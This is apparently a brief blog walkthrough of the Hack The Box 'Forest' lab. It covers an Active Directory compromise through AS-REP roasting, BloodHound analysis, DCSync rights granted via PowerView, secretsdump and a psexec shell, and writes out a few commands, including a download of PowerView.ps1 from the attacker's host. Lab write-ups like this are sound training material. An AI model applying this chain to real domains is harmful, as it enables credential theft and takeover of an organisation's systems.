Persecure : my learning archive

HTB Forrest

https://app.hackthebox.com/machines/Forest

Enumeration

Nmap

A Domain Controller for the htb.local is found

SMB

RPC

Found a service account.
Found a service account

Let’s do a test for discovering a user that does not require a pre-Authentication

Create a user list with the found users.

Start up kerbrute

The user accounts that are enabled with no pre-Authentication, it’s vulnerable to AS-REP Roasting attack.

Use the Impackt GetNPUsers.py from here.

Run the python script to dump out the hash.

./GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161

Use John to crack the hash.

Use evil-winrm to gain access.

First flag is found.

Use the bloodhound python script to collect JSON data for the Bloodhound app

Load the data to Bloodhound and look at svs-alfresco data

The node belongs to the account operators group.

Account Operators group are allowed create and modify users and add them to non-protected groups.

Download the Powerspoilt dev module from github and start a python server to transfer the PowerView script to the windows box.

powershell Invoke-WebRequest -Uri http://10.10.14.23:80/PowerView.ps1 -OutFile PowerView.ps1

Input the following commands 

$pass = convertto-securestring 'password' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ('HTB\persecure', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity persecure -

Use secretsdump.py to get the hashes.

Crack the hash with crackmapexec

Use psexec.py to gain a shell.

Root flag is found.

Create a website or blog at WordPress.com